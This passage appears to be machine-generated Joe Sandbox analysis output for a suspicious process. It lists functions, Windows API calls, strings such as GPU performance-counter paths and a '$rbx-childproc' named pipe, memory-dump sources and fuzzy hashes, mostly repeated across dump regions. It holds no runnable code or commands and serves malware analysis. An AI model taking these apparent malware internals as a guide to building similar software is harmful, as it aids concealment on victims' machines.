ext-ms-, xrefs: 000002527DF1F02E
api-ms-, xrefs: 000002527DF1F01B

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 2c41e001b67c40774395749805d35b7742b881be90460d1df5fc50e4507caa42
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 9651CF22701F44D2EB14DB56AC087AAA2A0EB4EBB2F5C0724DE3D473D4DF39D44D864A

Function 000002527DEE33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002527DEE33FD
GetProcessHeap.KERNEL32 ref: 000002527DEE3412
HeapAlloc.KERNEL32 ref: 000002527DEE3420
PdhGetCounterInfoW.PDH ref: 000002527DEE3436
StrCmpW.SHLWAPI ref: 000002527DEE344B

Part of subcall function 000002527DEE3950: StrCmpNW.SHLWAPI ref: 000002527DEE3972
Part of subcall function 000002527DEE3950: StrStrW.SHLWAPI ref: 000002527DEE3990
Part of subcall function 000002527DEE3950: StrToIntW.SHLWAPI ref: 000002527DEE39B7

GetProcessHeap.KERNEL32 ref: 000002527DEE3488
HeapFree.KERNEL32 ref: 000002527DEE3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000002527DEE3444

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 378b8b4f2c5a862f1f162503f3ed69297de2af60af824dd2f5f444d4beeb1056
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 51318F32600E41D7F762CB22EC08759E3A1F79EF97F444625AE4943AE4DF38D5598344

Function 000002527DF133A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002527DF133FD
GetProcessHeap.KERNEL32 ref: 000002527DF13412
HeapAlloc.KERNEL32 ref: 000002527DF13420
PdhGetCounterInfoW.PDH ref: 000002527DF13436
StrCmpW.SHLWAPI ref: 000002527DF1344B

Part of subcall function 000002527DF13950: StrCmpNW.SHLWAPI ref: 000002527DF13972
Part of subcall function 000002527DF13950: StrStrW.SHLWAPI ref: 000002527DF13990
Part of subcall function 000002527DF13950: StrToIntW.SHLWAPI ref: 000002527DF139B7

GetProcessHeap.KERNEL32 ref: 000002527DF13488
HeapFree.KERNEL32 ref: 000002527DF13496

Strings

\GPU Engine(*)\Running Time, xrefs: 000002527DF13444

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 4b724a26042a4afb85f5e7904725e4bcece06edc3f003052d4af7d3a46f43d67
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 3831C022600E50D6EB21CF12AC0C35AE3A0F78DBD6F440625DE59477E4DF38DA5A8749

Function 000002527DEE34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002527DEE3516
GetProcessHeap.KERNEL32 ref: 000002527DEE3527
HeapAlloc.KERNEL32 ref: 000002527DEE3535
PdhGetCounterInfoW.PDH ref: 000002527DEE354B
StrCmpW.SHLWAPI ref: 000002527DEE3560

Part of subcall function 000002527DEE3950: StrCmpNW.SHLWAPI ref: 000002527DEE3972
Part of subcall function 000002527DEE3950: StrStrW.SHLWAPI ref: 000002527DEE3990
Part of subcall function 000002527DEE3950: StrToIntW.SHLWAPI ref: 000002527DEE39B7

GetProcessHeap.KERNEL32 ref: 000002527DEE358D
HeapFree.KERNEL32 ref: 000002527DEE359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000002527DEE3559

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 625590d8b84daccc89ead980f11f1a3e908f2be3777c74960999a79d4a470e7f
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 03319832600F01CBFB52DF22AC88759B3A0F79AF87F4440249E4A437E4EE38E6498244

Function 000002527DF134B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002527DF13516
GetProcessHeap.KERNEL32 ref: 000002527DF13527
HeapAlloc.KERNEL32 ref: 000002527DF13535
PdhGetCounterInfoW.PDH ref: 000002527DF1354B
StrCmpW.SHLWAPI ref: 000002527DF13560

Part of subcall function 000002527DF13950: StrCmpNW.SHLWAPI ref: 000002527DF13972
Part of subcall function 000002527DF13950: StrStrW.SHLWAPI ref: 000002527DF13990
Part of subcall function 000002527DF13950: StrToIntW.SHLWAPI ref: 000002527DF139B7

GetProcessHeap.KERNEL32 ref: 000002527DF1358D
HeapFree.KERNEL32 ref: 000002527DF1359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000002527DF13559

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 8b9759d823bfe69523bb9ca5c13e9fc5bd12ac1eec536b11dfde2cc8fbf745aa
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 4A318E21610F42CAE710DF22AC4875AB3E1FB8AF96F444125DE6A437E4DE39E8498645

Function 000002527DEEA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002527DEEA289

Part of subcall function 000002527DEEB144: __GetUnwindTryBlock.LIBCMT ref: 000002527DEEB187
Part of subcall function 000002527DEEB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002527DEEB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002527DEEA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002527DEEA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002527DEEA6BC

Strings

csm, xrefs: 000002527DEEA384
csm, xrefs: 000002527DEEA30A
csm, xrefs: 000002527DEEA2A3

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: f3e54028b8abd315a5b698827b09cd2b890196b2ac17afa17b2327dd36a7f61e
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 90D17A72604B80CBFB22DF75D9483ADB7A0F74A799F500219EA8957BDADB34C488C744

Function 000002527DF1A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002527DF1A289

Part of subcall function 000002527DF1B144: __GetUnwindTryBlock.LIBCMT ref: 000002527DF1B187
Part of subcall function 000002527DF1B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002527DF1B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002527DF1A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002527DF1A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002527DF1A6BC

Strings

csm, xrefs: 000002527DF1A384
csm, xrefs: 000002527DF1A30A
csm, xrefs: 000002527DF1A2A3

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 9bcdcfd4bb3ba59b201d19b2003eb575ddf974bd91f841488bb05203616edd1b
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: F2D1CF32605F80CAEB20DF75D94839DB7A0F74AB89F100105EEA957BD6CB36C48AC746

Function 000002527DEB962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002527DEB9689

Part of subcall function 000002527DEBA544: __GetUnwindTryBlock.LIBCMT ref: 000002527DEBA587
Part of subcall function 000002527DEBA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002527DEBA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002527DEB9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002527DEB99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002527DEB9ABC

Strings

csm, xrefs: 000002527DEB970A
csm, xrefs: 000002527DEB96A3
csm, xrefs: 000002527DEB9784

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: ad4e632e629553a7d3238177e3a4f122d5dd088c6566c67c30895bb8426e2389
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: F9D17C32604F40C7EB62DF659C8879DB7E0F74A789F100215EA8957BD6DB38E089C704

Function 000002527DEE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002527DEE10B1
RegEnumValueW.ADVAPI32 ref: 000002527DEE1117
GetProcessHeap.KERNEL32 ref: 000002527DEE115A
HeapAlloc.KERNEL32 ref: 000002527DEE1168
GetProcessHeap.KERNEL32 ref: 000002527DEE1185
HeapFree.KERNEL32 ref: 000002527DEE1193

Strings

d, xrefs: 000002527DEE10D6

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 8e2dce530f5c9e3f54c2b77f8494cc045adce24ad891009a9ece2350228854f3
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 0B418173214F80D7E7A1CF21E84879EB7A1F389B99F448115DA8947798DF38C589CB44

Function 000002527DF1104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002527DF110B1
RegEnumValueW.ADVAPI32 ref: 000002527DF11117
GetProcessHeap.KERNEL32 ref: 000002527DF1115A
HeapAlloc.KERNEL32 ref: 000002527DF11168
GetProcessHeap.KERNEL32 ref: 000002527DF11185
HeapFree.KERNEL32 ref: 000002527DF11193

Strings

d, xrefs: 000002527DF110D6

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: b14f8d5905580a62306e0943d236e20422251d70411d6b2c891fc66a94cb92d3
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 7541D233214F80DAE760CF21E84839EB7A5F389B99F048129DB8907B98DF39C449CB45

Function 000002527DEE2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002527DEE252D
GetCurrentProcessId.KERNEL32 ref: 000002527DEE2537
CreateFileW.KERNEL32 ref: 000002527DEE2568
WriteFile.KERNEL32 ref: 000002527DEE2590
ReadFile.KERNEL32 ref: 000002527DEE25AF
CloseHandle.KERNEL32 ref: 000002527DEE25B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000002527DEE2549

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: a7dc825a339c2fefd13c0a3cab1c253f6beefbbcde3be269d5cfaedc06ebb346
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 49113732614B40C3E751CB21F85835AB760F38AB96F944215EA9942AE8DF3CC248CB48

Function 000002527DF12518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002527DF1252D
GetCurrentProcessId.KERNEL32 ref: 000002527DF12537
CreateFileW.KERNEL32 ref: 000002527DF12568
WriteFile.KERNEL32 ref: 000002527DF12590
ReadFile.KERNEL32 ref: 000002527DF125AF
CloseHandle.KERNEL32 ref: 000002527DF125B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000002527DF12549

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: cf2e55505fe3f49b8a8556f539964b4b3af07f0e1c09c5d0e5480b95eede1ebe
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 9F112932618A41C2E710CB21F85875AA761F38AB96F944315EA6902BE8CF3CC149CB85

Function 000002527DEE7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002527DEE7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000002527DEE7CCA
_RTC_Initialize.LIBCMT ref: 000002527DEE7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002527DEE7D1E
__scrt_release_startup_lock.LIBCMT ref: 000002527DEE7D49

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: d608f2f3923d6cec9a9d0980d82d9cccd331001ecad87626b54064bb77a89f1d
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: E681D460600E41C7FB53FB759C89369E690EB9F786F544125EA88873D6EB38C94D8308

Function 000002527DF17C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002527DF17C78
__scrt_acquire_startup_lock.LIBCMT ref: 000002527DF17CCA
_RTC_Initialize.LIBCMT ref: 000002527DF17CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002527DF17D1E
__scrt_release_startup_lock.LIBCMT ref: 000002527DF17D49

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 2cfe39848565bc594b947b11b25e99dc83019afb4f997f9bf033e415054707a3
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8C812421600E40D6FB50EB669C4D36AE2D1EB8F782F544015EAAD873D6DB3ACD4D834B

Function 000002527DEB7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002527DEB7078
__scrt_acquire_startup_lock.LIBCMT ref: 000002527DEB70CA
_RTC_Initialize.LIBCMT ref: 000002527DEB70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002527DEB711E
__scrt_release_startup_lock.LIBCMT ref: 000002527DEB7149

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 499510113e82b1991e141984357a58b93eca8c1b44b3527d0cf7b765d4a2cb9f
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 7B81DF20601F41C7FA53FB2D9C49B99E2D1EB8F782F1454359AC847BD6DA38E84E8718

Function 000002527DEE9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9B31
GetLastError.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9B3F
LoadLibraryExW.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9B69
FreeLibrary.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9BD7
GetProcAddress.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9BE3

Strings

api-ms-, xrefs: 000002527DEE9B51

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

